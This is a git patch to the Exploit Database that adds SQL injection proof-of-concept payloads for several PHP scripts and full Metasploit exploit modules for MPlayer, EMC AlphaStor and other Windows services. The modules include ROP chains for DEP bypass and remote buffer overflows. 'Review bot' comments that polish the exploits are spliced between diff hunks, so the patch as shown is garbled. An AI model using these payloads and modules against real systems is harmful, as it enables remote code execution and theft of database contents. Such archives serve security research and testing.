From 6e81f8d63501c085ded5c979bd80cdfec7bdd56d Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 15 Sep 2017 05:01:22 +0000 Subject: [PATCH] DB: 2017-09-15 13 new exploits MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit) Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit) Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit) EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit) EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit) Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit) Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit) haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit) KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit) Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit) Enterprise Edition Payment Processor Script 3.7 - SQL Injection Adserver Script 5.6 - SQL Injection PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection Theater Management Script - SQL Injection Justdial Clone Script - 'fid' Parameter SQL Injection --- files.csv | 15 +++- platforms/php/webapps/42591.txt | 4 +- platforms/php/webapps/42713.txt | 34 ++++++++ platforms/php/webapps/42714.txt | 27 ++++++ platforms/php/webapps/42715.txt | 27 ++++++ platforms/php/webapps/42716.txt | 31 +++++++ platforms/php/webapps/42717.txt | 27 ++++++ platforms/windows/local/42718.rb | 134 ++++++++++++++++++++++++++++++ platforms/windows/remote/42719.rb | 124 +++++++++++++++++++++++++++ platforms/windows/remote/42720.rb | 112 +++++++++++++++++++++++++ platforms/windows/remote/42721.rb | 88 ++++++++++++++++++++ platforms/windows/remote/42722.rb | 105 +++++++++++++++++++++++ platforms/windows/remote/42723.rb | 74 +++++++++++++++++ platforms/windows/remote/42724.rb | 78 +++++++++++++++++ platforms/windows/remote/42725.rb | 88 ++++++++++++++++++++ 15 files changed, 965 insertions(+), 3 deletions(-) create mode 100755 platforms/php/webapps/42713.txt 
create mode 100755 platforms/php/webapps/42714.txt
create mode 100755 platforms/php/webapps/42715.txt
create mode 100755 platforms/php/webapps/42716.txt
create mode 100755 platforms/php/webapps/42717.txt
create mode 100755 platforms/windows/local/42718.rb
create mode 100755 platforms/windows/remote/42719.rb
create mode 100755 platforms/windows/remote/42720.rb
create mode 100755 platforms/windows/remote/42721.rb
create mode 100755 platforms/windows/remote/42722.rb
create mode 100755 platforms/windows/remote/42723.rb
create mode 100755 platforms/windows/remote/42724.rb
create mode 100755 platforms/windows/remote/42725.rb
diff --git a/files.csv b/files.csv
index fedb755d9..0a93e9c2b 100644
--- a/files.csv
+++ b/files.csv
@@ -9235,6 +9235,7 @@ id,file,description,date,author,platform,type,port
 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0
+42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15804,7 +15805,7 @@ id,file,description,date,author,platform,type,port
 42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
 42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
 42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
-42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
+42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote,0
 42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
 42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
 42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
@@ -15819,6 +15820,13 @@ id,file,description,date,author,platform,type,port
 42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
 42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
 42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
+42719,platforms/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3500
+42720,platforms/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3000
+42721,platforms/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,2125
+42722,platforms/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote,0
+42723,platforms/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53
+42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
+42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse 
TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38492,3 +38500,8 @@ id,file,description,date,author,platform,type,port
 42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
 42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
 42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0
+42713,platforms/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
+42714,platforms/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
+42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
+42716,platforms/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
+42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42591.txt b/platforms/php/webapps/42591.txt
index f15b94d6b..efff6f0b2 100755
--- a/platforms/php/webapps/42591.txt
+++ b/platforms/php/webapps/42591.txt
@@ -63,8 +63,8 @@ and user role of the admin in the comment section
 Reference:
 =========
-Video POC :
-https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
+1. https://www.youtube.com/watch?v=8GZg1IuSfCs
+2. https://www.techipick.com/exploiting-router-authentication-through-web-interface
 Disclosure Timeline:
 ======================================
diff --git a/platforms/php/webapps/42713.txt b/platforms/php/webapps/42713.txt
new file mode 100755
index 000000000..d8a91e133
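Review bot: The new row for 42722 records port `0` while the module it indexes registers `Opt::RPORT(9120)` and its description names port 9120; every other remote module added in this commit carries its module's default port (3500, 3000, 2125, 53, 12401, 69). Suggest `...,"James Fitts",windows,remote,9120` for that row so port-based searches of the index find it.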
--- /dev/null
+++ b/platforms/php/webapps/42713.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
+# Dork: N/A
+# Date: 14.09.2017
+# Vendor Homepage: https://www.goterhosting.com/
+# Software Link: https://www.goterhosting.com/payment-processor-script.php
+# Demo: http://www.enterprise-edition.gvmhosting.com/
+# Version: 3.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+#
+# http://localhost/[PATH]/login
+#
+# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
+#
+# http://localhost/[PATH]/products?id=[SQL]&action=update
+#
+# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
+#
+# http://localhost/[PATH]/bank?id=[SQL]&action=update
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42714.txt b/platforms/php/webapps/42714.txt
new file mode 100755
index 000000000..12f326802
--- /dev/null
+++ b/platforms/php/webapps/42714.txt
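Review bot: None of the five advisories added here (42713–42717) carries a remediation or vendor-notification line, although the same commit's edit to 42591.txt shows the repository's advisories normally include a `Disclosure Timeline:` section. The header block stops at `# CVE: N/A`, so a reader cannot tell whether the vendor was contacted or whether a fixed version exists. Suggest one header line per file, for example `# Fix: [vendor notified on DATE / no fixed version known]` (with the real status), and a Description sentence naming the affected parameter (`id`, `type`, `fid`) so that the mitigation — parameterised queries on those inputs — is explicit rather than implied by the PoC.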
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Adserver Script 5.6 - SQL Injection
+# Dork: N/A
+# Date: 14.09.2017
+# Vendor Homepage: https://www.goterhosting.com/
+# Software Link: https://www.goterhosting.com/adserverscript.php
+# Demo: http://adserverscript.gvmhosting.com/
+# Version: 5.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an advertiser to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
+#
+# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42715.txt b/platforms/php/webapps/42715.txt
new file mode 100755
index 000000000..e293517b1
--- /dev/null
+++ b/platforms/php/webapps/42715.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
+# Dork: N/A
+# Date: 14.09.2017
+# Vendor Homepage: https://www.goterhosting.com/
+# Software Link: https://www.goterhosting.com/ptc-ksv1.php
+# Demo: http://www.ksv1demo.gvmhosting.com/
+# Version: 1.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
+#
+# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42716.txt b/platforms/php/webapps/42716.txt
new file mode 100755
index 000000000..cbfefc0ed
--- /dev/null
+++ b/platforms/php/webapps/42716.txt
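Review bot: The in-file `# Exploit Title:` for 42715.txt reads `PTC KSV1 Script 1.7 - SQL Injection`, while the files.csv row and the commit subject add the parameter (`'type' Parameter SQL Injection`); 42717.txt has the same drift against its `'fid' Parameter` index entry. The PoC line already names the parameter (`type=[SQL]`), so the header should match the index: `# Exploit Title: PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection`.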
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Theater Management Script - SQL Injection
+# Dork: N/A
+# Date: 14.09.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
+# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/show-time.php?moid=[SQL]
+#
+# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
+#
+# http://localhost/[PATH]/event-detail.php?eid=[SQL]
+#
+# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42717.txt b/platforms/php/webapps/42717.txt
new file mode 100755
index 000000000..1d8076d6b
--- /dev/null
+++ b/platforms/php/webapps/42717.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Justdial Clone Script - SQL Injection
+# Dork: N/A
+# Date: 14.09.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
+# Demo: http://74.124.215.220/~jusdil/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
+#
+# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
+#
+# Etc..
+# # # # #
diff --git a/platforms/windows/local/42718.rb b/platforms/windows/local/42718.rb
new file mode 100755
index 000000000..1bef85ffa
--- /dev/null
+++ b/platforms/windows/local/42718.rb
@@ -0,0 +1,134 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mplayer SAMI Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in + SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is + triggered during the parsing of an overly long string found + in a malicious SAMI subtitle file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'James Fitts' ], + 'Version' => '$Revision: $', + 'References' => + [ + [ 'BID', '49149' ], + [ 'OSVDB', '74604' ], + [ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ], + [ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 700, + 'BadChars' => "\x00\x0a\x0d\x3c\x7b", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'DisableNops' => 'True', + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 EN', + { + # pushad/ retn + # msvcrt.dll + 'Ret' => 0x77c12df9, + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Jun 14 2011', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']), + ], self.class) + end + + def make_nops(cnt) + return "\x41" * cnt + end + + def exploit + + # Chain 2 => kernel32!virtualalloc + # msvcrt.dll + gadgets = [ + 0x77c23e7a, # XOR EAX, EAX/ RETN + 0x77c13ffd, # XCHG EAX, ECX/ RETN + 0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10 + 0x41414141, + 0x77c127e5, # INC EBX/ RETN + 0x41414141, + 0x41414141, + 0x41414141, + 0x41414141, + 0x77c3b860, # POP EAX/ RETN + 0x41414141, + 
0x77c2d998, # POP ECX/ RETN + 0x41413141, + 0x77c47918, # SUB EAX, ECX/ RETN + 0x77c58fbc, # XCHG EAX, EDX/ RETN + 0x77c3b860, # POP EAX/ RETN + 0x41414141, + 0x77c2d998, # POP ECX/ RETN + 0x41414101, + 0x77c47918, # SUB EAX, ECX/ RETN + 0x77c13ffd, # XCHG EAX, ECX/ RETN + 0x77c53f3a, # POP EBP/ RETN + 0x77c53f3a, # POP EBP/ RETN + 0x77c39dd3, # POP EDI/ POP ESI/ RETN + 0x77c39dd5, # ROP NOP + 0x77c168cd, # JMP EAX + 0x77c21d16, # POP EAX/ RETN + 0x7c809af1, # kernel32!virtualalloc + 0x77c12df9, # PUSHAD/ RETN + 0x77c35524, # PUSH ESP/ RETN + ].flatten.pack("V*") + + p = make_nops(16) + payload.encoded + + boom = pattern_create(979) + boom << [target.ret].pack('V') + boom[83, gadgets.length] = gadgets + boom[203, p.length] = p + + # Chain 1 => Stack Pivot + boom[963, 4] = [0x41414101].pack('V') # Size + boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2 + boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1 + boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3 + + + smi = %Q| + + + #{rand_text_alpha_upper(40)} + #{boom} +| + + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(smi) + + end + +end +__END__ diff --git a/platforms/windows/remote/42719.rb b/platforms/windows/remote/42719.rb new file mode 100755 index 000000000..e34599b1a --- /dev/null +++ b/platforms/windows/remote/42719.rb 
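Review bot: `def make_nops(cnt)` silently overrides the framework's `make_nops` helper with a constant `"\x41" * cnt` filler, and its only caller here (`p = make_nops(16) + payload.encoded`) gives no hint that the override is deliberate; a line such as `# Overrides Msf::Exploit#make_nops: fixed 0x41 filler instead of a generated NOP sled` belongs above it. The `Name` says Mplayer while the `Description` says SMPlayer 0.6.9 — pick one product string so the index entry and the module agree. Several booleans are passed as strings (`'DisablePayloadHandler' => 'true'`, `'DisableNops' => 'True'`; likewise `'true'` in 42719.rb and 42720.rb and `'True'` in 42722.rb), whereas 42723.rb uses the literal `true`, which is the unambiguous form. `'Version' => '$Revision: $'` is an unexpanded SVN keyword carrying no information (also present in 42720.rb, 42721.rb and 42722.rb).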
@@ -0,0 +1,124 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in EMC + Alphastor Library Manager version < 4.0 build 910. The overflow + is triggered due to a lack of sanitization of the pointers used + for two strcpy functions. + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ], + [ 'CVE', '2013-0946' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'wfsdelay' => 1000 + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 160, + 'DisableNops' => 'true', + 'BadChars' => "\x00\x09\x0a\x0d", + 'StackAdjustment' => -404, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'Compat' => + { + 'SymbolLookup' => 'ws2ord', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows Server 2003 SP2 EN', + { + # msvcrt.dll + # add esp, 0c/ retn + 'Ret' => 0x77bdda70, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + Opt::RPORT(3500) + ], self.class ) + end + + def exploit + connect + + p = "\x90" * 8 + p << payload.encoded + + # msvcrt.dll + # 96 bytes + rop = [ + 0x77bb2563, # pop eax/ retn + 0x77ba1114, # ptr to kernel32!virtualprotect + 0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn + 0xfeedface, + 0x77bb0c86, # xchg eax, esi/ retn + 0x77bc9801, # pop ebp/ retn + 0x77be2265, + 0x77bb2563, # pop eax/ retn + 0x03C0990F, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb48d3, # pop eax/ retn + 0x77bf21e0, + 0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn + 0x77bbfc02, # pop ecx/ retn + 0x77bef001, + 0x77bd8c04, # pop edi/ retn + 0x77bd8c05, + 0x77bb2563, # pop eax/ retn + 0x03c0984f, + 
0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb8285, # xchg eax, edx/ retn + 0x77bb2563, # pop eax/ retn + 0x90909090, + 0x77be6591, # pushad/ add al, 0efh/ retn + ].pack("V*") + + buf = Rex::Text.pattern_create(514) + buf[0, 2] = "O~" # opcode + buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52 + buf[25, 4] = [target.ret].pack('V') # stack pivot 12 + buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52 + buf[57, 4] = [0x01167e20].pack('V') # ptr + buf[69, rop.length] = rop + buf[165, 4] = [0x909073eb].pack('V') # jmp $+117 + buf[278, 4] = [0x0116fd59].pack('V') # ptr + buf[282, p.length] = p + buf[512, 1] = "\x00" + + # junk + buf << "AAAA" + buf << "BBBB" + buf << "CCCC" + buf << "DDDD" + + print_status("Trying target %s..." % target.name) + + sock.put(buf) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42720.rb b/platforms/windows/remote/42720.rb new file mode 100755 index 000000000..ebcd3641f --- /dev/null +++ b/platforms/windows/remote/42720.rb 
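Review bot: The `DefaultOptions` key `'wfsdelay' => 1000` is lower-cased where the framework option is named `WfsDelay`; datastore lookups are, as far as I know, case-insensitive so it probably works, but the canonical spelling saves a reader from having to check. The author string `'james fitts'` is lower-case here and in 42721.rb, 42723.rb and 42725.rb, while 42718.rb, 42720.rb, 42722.rb, 42724.rb and every files.csv row use `James Fitts`; one spelling keeps the index searchable. The description attributes the overflow to "two strcpy functions" without saying where that was established — the ZDI and CVE entries already in `References` cover the bug, so naming them in that sentence would ground the claim.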
@@ -0,0 +1,112 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EMC AlphaStor Device Manager Opcode 0x72', + 'Description' => %q{ + This module exploits a stack based buffer overflow vulnerability + found in EMC Alphastor Device Manager. The overflow is triggered + when sending a specially crafted packet to the rrobotd.exe service + listening on port 3000. During the copying of strings to the stack + an unbounded sprintf() function overwrites the return pointer + leading to remote code execution. + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'URL', '0day' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 160, + 'DisableNops' => 'true', + 'BadChars' => "\x00\x09\x0a\x0d", + 'StackAdjustment' => -404, + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'Compat' => + { + 'ConnectionType' => '+ws2ord', + } + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows Server 2003 SP2 EN', + { + # pop eax/ retn + # msvcrt.dll + 'Ret' => 0x77bc5d88, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2013')) + + register_options( + [ + Opt::RPORT(3000) + ], self.class ) + end + + def exploit + connect + + # msvcrt.dll + # 96 bytes + rop = [ + 0x77bb2563, # pop eax/ retn + 0x77ba1114, # ptr to kernel32!virtualprotect + 0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn + 0xfeedface, + 0x77bb0c86, # xchg eax, esi/ retn + 0x77bc9801, # pop ebp/ retn + 0x77be2265, + 0x77bb2563, # pop eax/ retn + 0x03C0990F, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb48d3, # pop eax/ retn + 0x77bf21e0, + 0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn + 0x77bbfc02, # pop ecx/ retn + 0x77bef001, + 0x77bd8c04, # pop edi/ retn + 0x77bd8c05, + 
0x77bb2563, # pop eax/ retn + 0x03c0984f, + 0x77bdd441, # sub eax, 3c0940fh/ retn + 0x77bb8285, # xchg eax, edx/ retn + 0x77bb2563, # pop eax/ retn + 0x90909090, + 0x77be6591, # pushad/ add al, 0efh/ retn + ].pack("V*") + + buf = "\xcc" * 550 + buf[246, 4] = [target.ret].pack('V') + buf[250, 4] = [0x77bf6f80].pack('V') + buf[254, rop.length] = rop + buf[350, payload.encoded.length] = payload.encoded + + packet = "\x72#{buf}" + + print_status("Trying target %s..." % target.name) + + sock.put(packet) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42721.rb b/platforms/windows/remote/42721.rb new file mode 100755 index 000000000..806df9bbe --- /dev/null +++ b/platforms/windows/remote/42721.rb 
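Review bot: `[ 'URL', '0day' ]` is not a reference: the `URL` type expects a resolvable link, and the same placeholder appears in 42725.rb. If no public advisory exists, drop the entry or point to the vendor page; otherwise a reader following `References` lands nowhere. The `Compat` block uses `'ConnectionType' => '+ws2ord'` whereas 42719.rb and 42722.rb use `'SymbolLookup' => 'ws2ord'`; `ws2ord` looks like a symbol-lookup value rather than a connection type, so this is presumably a copy slip worth confirming. `'Version' => '$Revision: $'` is an unexpanded SVN keyword.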
